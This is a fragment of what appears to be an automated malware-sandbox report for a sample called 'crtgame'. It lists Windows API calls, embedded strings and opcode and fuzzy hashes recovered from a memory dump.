                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02BC346B
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BC3472
                                                                          • GetLastError.KERNEL32 ref: 02BC3486
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02BC34D7
                                                                          • RtlEnterCriticalSection.NTDLL(00000018), ref: 02BC34ED
                                                                          • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02BC3518
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                          • String ID: CancelIoEx$KERNEL32
                                                                          • API String ID: 2902213904-434325024
                                                                          • Opcode ID: a8cb8bf82bf553965ffccd43e5cf9a040e20fa4458473369ba0134eae4cc2721
                                                                          • Instruction ID: 2550b8268f9d9e6b471282725f52778edd7663150c7da6efb978e848b5186e7d
                                                                          • Opcode Fuzzy Hash: a8cb8bf82bf553965ffccd43e5cf9a040e20fa4458473369ba0134eae4cc2721
                                                                          • Instruction Fuzzy Hash: 13318F71900209DFDB11EF64D8846AEBBF9FF48315F1489D9E8059B242DB70D901CFA1
                                                                          APIs
                                                                          • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02BD10B0
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD10C5
                                                                          • ResetEvent.KERNEL32(00000000), ref: 02BD10CF
                                                                          • CloseHandle.KERNEL32(00000000,C2070DBA), ref: 02BD1104
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C2070DBA), ref: 02BD117A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD118F
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$CreateOpenReset
                                                                          • String ID:
                                                                          • API String ID: 1285874450-0
                                                                          • Opcode ID: f21abaf723f546f1643cb3fead93a6e6fcec1beb40ca77aaf360f8a1f99bbc67
                                                                          • Instruction ID: 44d0f1970634c80fcd1ade08035caf58ba3cd5b7c9a4e1ee0f469820710a9cce
                                                                          • Opcode Fuzzy Hash: f21abaf723f546f1643cb3fead93a6e6fcec1beb40ca77aaf360f8a1f99bbc67
                                                                          • Instruction Fuzzy Hash: 30415F70D14348ABDF20DFE8C844BEDBBB8EF05764F504259E829EB281E7709945CB61
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC20AC
                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02BC20CD
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC20D8
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02BC213E
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02BC217A
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02BC2187
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                          • String ID:
                                                                          • API String ID: 1171374749-0
                                                                          • Opcode ID: 61b370fc6e877e0343cf397e9bceca8c0bc7f2d3107e04ffdd17704dec4b4fc1
                                                                          • Instruction ID: 9657f63ff1272d2ad7d9db4d1fc2336d2eb38640d14a41a1be3bd6e05be3c18f
                                                                          • Opcode Fuzzy Hash: 61b370fc6e877e0343cf397e9bceca8c0bc7f2d3107e04ffdd17704dec4b4fc1
                                                                          • Instruction Fuzzy Hash: 704116715047019FC321DF25D884A6BBBF9FBC8664F104A5EB8AA93251DB30E545CFA2
                                                                          APIs
                                                                            • Part of subcall function 02BD18D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02BD112E,?,?), ref: 02BD18FF
                                                                            • Part of subcall function 02BD18D0: CloseHandle.KERNEL32(00000000,?,?,02BD112E,?,?), ref: 02BD1914
                                                                            • Part of subcall function 02BD18D0: SetEvent.KERNEL32(00000000,02BD112E,?,?), ref: 02BD1927
                                                                          • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02BD10B0
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD10C5
                                                                          • ResetEvent.KERNEL32(00000000), ref: 02BD10CF
                                                                          • CloseHandle.KERNEL32(00000000,C2070DBA), ref: 02BD1104
                                                                          • __CxxThrowException@8.LIBCMT ref: 02BD1135
                                                                            • Part of subcall function 02BD3F5A: RaiseException.KERNEL32(?,?,?,02BF0F6C,?,00000400,?,?,?,02BD359C,?,02BF0F6C,00000000,00000001), ref: 02BD3FAF
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C2070DBA), ref: 02BD117A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD118F
                                                                            • Part of subcall function 02BD1610: GetCurrentProcessId.KERNEL32(?), ref: 02BD1669
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,C2070DBA), ref: 02BD119F
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                          • String ID:
                                                                          • API String ID: 2227236058-0
                                                                          • Opcode ID: c94edc3f47c896a3891f57e4af254fe791c2da64fb31d9e7a32e2ecb39e9d51b
                                                                          • Instruction ID: 26ef030118aa149fbfb5397c1c52746a0074af89ce5729f89f18ea8a5c9365c4
                                                                          • Opcode Fuzzy Hash: c94edc3f47c896a3891f57e4af254fe791c2da64fb31d9e7a32e2ecb39e9d51b
                                                                          • Instruction Fuzzy Hash: 01317E75D10349ABDF20DBE8DC45BEDB7B9EF05324F5402A9E82CEB281E7209945CB61
                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 02BD5794
                                                                            • Part of subcall function 02BD7F02: RtlEncodePointer.NTDLL(00000000), ref: 02BD7F05
                                                                            • Part of subcall function 02BD7F02: __initp_misc_winsig.LIBCMT ref: 02BD7F20
                                                                            • Part of subcall function 02BD7F02: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02BD8C81
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02BD8C95
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02BD8CA8
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02BD8CBB
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02BD8CCE
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02BD8CE1
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02BD8CF4
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02BD8D07
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02BD8D1A
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02BD8D2D
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02BD8D40
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02BD8D53
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02BD8D66
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02BD8D79
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02BD8D8C
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02BD8D9F
                                                                          • __mtinitlocks.LIBCMT ref: 02BD5799
                                                                          • __mtterm.LIBCMT ref: 02BD57A2
                                                                            • Part of subcall function 02BD580A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02BD833A
                                                                            • Part of subcall function 02BD580A: RtlDeleteCriticalSection.NTDLL(02BF3978), ref: 02BD8363
                                                                          • __calloc_crt.LIBCMT ref: 02BD57C7
                                                                          • __initptd.LIBCMT ref: 02BD57E9
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02BD57F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                          • String ID:
                                                                          • API String ID: 1500305132-0
                                                                          • Opcode ID: b30d59589faaa9f077e3e54f6fb7f94d94287e65d01130294fad6b81aa3ac84b
                                                                          • Instruction ID: 2bd58acbf3b6c4cdf0a9f7e54234589a0314f374f5cb52925ce4eda9824d7104
                                                                          • Opcode Fuzzy Hash: b30d59589faaa9f077e3e54f6fb7f94d94287e65d01130294fad6b81aa3ac84b
                                                                          • Instruction Fuzzy Hash: 60F024325983115EE6747A787C017CA27C6EF01776B7006F9E010C60C4FF12A0420B60
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02BD2E73,00000000), ref: 02BD2EDB
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BD2EE2
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02BD2EEE
                                                                          • RtlDecodePointer.NTDLL(00000001), ref: 02BD2F0B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoInitialize$combase.dll
                                                                          • API String ID: 3489934621-340411864
                                                                          • Opcode ID: 603548d06546987238b3a0d3f6429b1a7ce29be5e979928bce8c53ad8f8ba07b
                                                                          • Instruction ID: 5e06fa115116ce63733846ae0da182bed4b419898d0c6e1bafa1afe32f787485
                                                                          • Opcode Fuzzy Hash: 603548d06546987238b3a0d3f6429b1a7ce29be5e979928bce8c53ad8f8ba07b
                                                                          • Instruction Fuzzy Hash: F6E01A70ED0380EBEF605F70EC49B4437A9A700782F605DA4FA12EB491DFB544A49F10
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02BD2EB0), ref: 02BD2FB0
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BD2FB7
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02BD2FC2
                                                                          • RtlDecodePointer.NTDLL(02BD2EB0), ref: 02BD2FDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: 01e9920e4206b4893a72ee3e0a141f0e6197df19fb4e789133009439cf60b1a9
                                                                          • Instruction ID: b66f5ceb15a0de0f8ff290f22c28a3c9659e45be51cec47468f5505e61c4ef89
                                                                          • Opcode Fuzzy Hash: 01e9920e4206b4893a72ee3e0a141f0e6197df19fb4e789133009439cf60b1a9
                                                                          • Instruction Fuzzy Hash: 40E09270DC0304EBEF905F70AD4DB547BA9A714781F604D94FA12EB4A5EFB580A0DB15
                                                                          APIs
                                                                          • TlsGetValue.KERNEL32(00000025,C2070DBA,?,?,?,?,00000000,02BE64B8,000000FF,02BD1BCA), ref: 02BD196A
                                                                          • TlsSetValue.KERNEL32(00000025,02BD1BCA,?,?,00000000), ref: 02BD19D7
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BD1A01
                                                                          • HeapFree.KERNEL32(00000000), ref: 02BD1A04
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: HeapValue$FreeProcess
                                                                          • String ID:
                                                                          • API String ID: 1812714009-0
                                                                          • Opcode ID: 1d13b0f70136bd23b78d0caccc0ebbf38db27909370b445994f7b7664b29eb61
                                                                          • Instruction ID: 8a021d6411cf9a7f86c462819e43a32f8ddd278d05a22c3cf20c52cbd007fcc4
                                                                          • Opcode Fuzzy Hash: 1d13b0f70136bd23b78d0caccc0ebbf38db27909370b445994f7b7664b29eb61
                                                                          • Instruction Fuzzy Hash: CB51DF35A143449FDB20DF6DD444B96BBE4EB457A4F098699E87D9B290E734EC00CBA0
                                                                          APIs
                                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 02BE5190
                                                                          • __FindPESection.LIBCMT ref: 02BE51AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FindHandlersScopeSectionTableValidate
                                                                          • String ID:
                                                                          • API String ID: 876702719-0
                                                                          • Opcode ID: 3a73fe9ef65b8ff92e07e258f8bdc8316e62f61db87a60ab2935f585f4c45dcb
                                                                          • Instruction ID: 31c3f2807d09a66df4a17ab7a9d74d6c13810b16a61dd7021cb79d633060555c
                                                                          • Opcode Fuzzy Hash: 3a73fe9ef65b8ff92e07e258f8bdc8316e62f61db87a60ab2935f585f4c45dcb
                                                                          • Instruction Fuzzy Hash: C5A18E71A006158FCF20CF58D980BADB7B5FB44328F9586E9D947AB351EB35E841CBA0
                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BC1CB1
                                                                          • CloseHandle.KERNEL32(?), ref: 02BC1CBA
                                                                          • InterlockedExchangeAdd.KERNEL32(02BF74EC,00000000), ref: 02BC1CC6
                                                                          • TerminateThread.KERNEL32(?,00000000), ref: 02BC1CD4
                                                                          • QueueUserAPC.KERNEL32(02BC1E7C,?,00000000), ref: 02BC1CE1
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02BC1CEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                          • String ID:
                                                                          • API String ID: 1946104331-0
                                                                          • Opcode ID: d64751f4493bb525ccfc7b9ee8be531aff11f8d279751b136da7f24989521b6c
                                                                          • Instruction ID: 24b1731329e93c1e21b2404a7ec75de5bce473292299bdf934e5d1628beed71f
                                                                          • Opcode Fuzzy Hash: d64751f4493bb525ccfc7b9ee8be531aff11f8d279751b136da7f24989521b6c
                                                                          • Instruction Fuzzy Hash: D4F08131950200FF9B209B9ADC0DC57FFBCEB85720B10469DF52AD6191DF7059109B60
                                                                          APIs
                                                                          • std::exception::exception.LIBCMT ref: 02BD137F
                                                                            • Part of subcall function 02BD1ED3: std::exception::_Copy_str.LIBCMT ref: 02BD1EEC
                                                                            • Part of subcall function 02BD0750: __CxxThrowException@8.LIBCMT ref: 02BD07AE
                                                                          • std::exception::exception.LIBCMT ref: 02BD13DE
                                                                          Strings
                                                                          • boost unique_lock owns already the mutex, xrefs: 02BD13CD
                                                                          • $, xrefs: 02BD13E3
                                                                          • boost unique_lock has no mutex, xrefs: 02BD136E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                          • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                          • API String ID: 2140441600-46888669
                                                                          • Opcode ID: 3fdc9db962c7125609d7195c80e32fb5044442a6bdbaf8650f7754aec6e11f76
                                                                          • Instruction ID: 39d176e145c5e5115f7d91bc70c23c19f73dbc371511dcc02b7aef55ffdae4aa
                                                                          • Opcode Fuzzy Hash: 3fdc9db962c7125609d7195c80e32fb5044442a6bdbaf8650f7754aec6e11f76
                                                                          • Instruction Fuzzy Hash: 7A2108B15187809FD750EF24C54479BBBE5AB84708F004E9DF4A687650E7B5D808CF92
                                                                          APIs
                                                                          • __getptd_noexit.LIBCMT ref: 02BD4480
                                                                            • Part of subcall function 02BD5672: GetLastError.KERNEL32(00000000,?,02BD5860,02BD2A33,00000000,?,02BD84CC,?,?,?,00000000,?,02BD83B9,00000018,02BF16D8,00000008), ref: 02BD5674
                                                                            • Part of subcall function 02BD5672: __calloc_crt.LIBCMT ref: 02BD5695
                                                                            • Part of subcall function 02BD5672: __initptd.LIBCMT ref: 02BD56B7
                                                                            • Part of subcall function 02BD5672: GetCurrentThreadId.KERNEL32 ref: 02BD56BE
                                                                            • Part of subcall function 02BD5672: SetLastError.KERNEL32(00000000,02BD84CC,?,?,?,00000000,?,02BD83B9,00000018,02BF16D8,00000008,02BD8306,?,?,?,02BD5588), ref: 02BD56D6
                                                                          • __calloc_crt.LIBCMT ref: 02BD44A3
                                                                          • __get_sys_err_msg.LIBCMT ref: 02BD44C1
                                                                          • __invoke_watson.LIBCMT ref: 02BD44DE
                                                                          Strings
                                                                          • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02BD448B, 02BD44B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                          • API String ID: 109275364-798102604
                                                                          • Opcode ID: 8e814721e618db2b8c0a7ead50a7faa151977d6726fd270f7f7e5d80e591ae0d
                                                                          • Instruction ID: 044211bb215f9e1898ba31580d1f0b77532f917f915f86191a8a91263e54c267
                                                                          • Opcode Fuzzy Hash: 8e814721e618db2b8c0a7ead50a7faa151977d6726fd270f7f7e5d80e591ae0d
                                                                          • Instruction Fuzzy Hash: 08F0E932900B146BEA31662A5C40AEB73FDEB417B0B0945E6FD45D6600FF75FC804E95
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                          • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                          • GetLastError.KERNEL32 ref: 02BC237A
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID: pqcs
                                                                          • API String ID: 1619523792-2559862021
                                                                          • Opcode ID: e50d71c3df6b13cd0610310871a7f18d38671032a2315ae1b90250a145c28b02
                                                                          • Instruction ID: a5d6a151ac3bf33a146f34b71752558f0bd1cff7dfeb8db9270a6d2ef5fbc1d8
                                                                          • Opcode Fuzzy Hash: e50d71c3df6b13cd0610310871a7f18d38671032a2315ae1b90250a145c28b02
                                                                          • Instruction Fuzzy Hash: 7BF0B470A40304AFDB20BF749809AABBBBCEB80341F1049AAFD09D7141FB70D9149B91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC4035
                                                                          • GetProcessHeap.KERNEL32(00000000,02BCA5C3,?,?,?,?,?,02BCA5C3), ref: 02BC4042
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02BC4049
                                                                          • std::exception::exception.LIBCMT ref: 02BC4063
                                                                            • Part of subcall function 02BCA053: __EH_prolog.LIBCMT ref: 02BCA058
                                                                            • Part of subcall function 02BCA053: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BCA067
                                                                            • Part of subcall function 02BCA053: __CxxThrowException@8.LIBCMT ref: 02BCA086
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 3112922283-2104205924
                                                                          • Opcode ID: 28b9807435bfda0e3cd6a67f047e90ffbfdd4266f3c39f5efe3fd3590359379c
                                                                          • Instruction ID: cab1bbad843c69982f4ba32a0d0ebdf4c55dc3326c9d7e0210f7fc6d3c479358
                                                                          • Opcode Fuzzy Hash: 28b9807435bfda0e3cd6a67f047e90ffbfdd4266f3c39f5efe3fd3590359379c
                                                                          • Instruction Fuzzy Hash: C5F05E72E44209DFDF10EFE4D818BAEB778EB04340F004599E916A6540DB7552148F51
                                                                          APIs
                                                                            • Part of subcall function 02BD1450: CloseHandle.KERNEL32(00000000,C2070DBA), ref: 02BD14A1
                                                                            • Part of subcall function 02BD1450: WaitForSingleObject.KERNEL32(?,000000FF,C2070DBA,?,?,?,?,C2070DBA,02BD1423,C2070DBA), ref: 02BD14B8
                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02BD171E
                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02BD173E
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02BD1777
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02BD17CB
                                                                          • SetEvent.KERNEL32(?), ref: 02BD17D2
                                                                            • Part of subcall function 02BC418C: CloseHandle.KERNEL32(00000000,?,02BD1705), ref: 02BC41B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 4166353394-0
                                                                          • Opcode ID: 7b4f16d51c908c29807b85f4df829e2171b086af5480604a6656cad56b6a452d
                                                                          • Instruction ID: 51393972abb4a315616c88587f85cc141acb1e0a8d597b36a2ebbf9e89e9bb89
                                                                          • Opcode Fuzzy Hash: 7b4f16d51c908c29807b85f4df829e2171b086af5480604a6656cad56b6a452d
                                                                          • Instruction Fuzzy Hash: BE41E1B06113058BDB259F2DCC80BA7B7E8EF45724F1806A8EC1CDB2A5E734D8018BA1
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC20AC
                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02BC20CD
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC20D8
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02BC213E
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                          • String ID:
                                                                          • API String ID: 1611172436-0
                                                                          • Opcode ID: 09cd6e40f6f66e3ad3a51f6977c7a163bf631a52981f3137f0c5978b2fec4c67
                                                                          • Instruction ID: 6820ce71b7de7ea2f6145d04cff7f5cdc9bbdb013893ca3366c4ad92d9b61aa8
                                                                          • Opcode Fuzzy Hash: 09cd6e40f6f66e3ad3a51f6977c7a163bf631a52981f3137f0c5978b2fec4c67
                                                                          • Instruction Fuzzy Hash: 73315A725047019FC710DF29C885A6BB7F9EFD8664F200A5EF89693650DB30E546CBA1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCDA89
                                                                            • Part of subcall function 02BC1A01: TlsGetValue.KERNEL32 ref: 02BC1A0A
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCDB08
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BCDB24
                                                                          • InterlockedIncrement.KERNEL32(02BF5170), ref: 02BCDB49
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BCDB5E
                                                                            • Part of subcall function 02BC27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02BC284E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                          • String ID:
                                                                          • API String ID: 1578506061-0
                                                                          • Opcode ID: 143658195fcd1346cd287e6a59091a5d0e6e6863a94b5050d01ab6067dd00be3
                                                                          • Instruction ID: 3b696b8bef62554f8302c939487853d0062ceda3b1de334bc6cd96a3c35870ab
                                                                          • Opcode Fuzzy Hash: 143658195fcd1346cd287e6a59091a5d0e6e6863a94b5050d01ab6067dd00be3
                                                                          • Instruction Fuzzy Hash: A53117B1905209DFCB10DFA9D5446AABBF8FB08310F1085AEE859D7641E774AA14CFA0
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC21DA
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21ED
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02BC2224
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02BC2237
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02BC2261
                                                                            • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                            • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                            • Part of subcall function 02BC2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
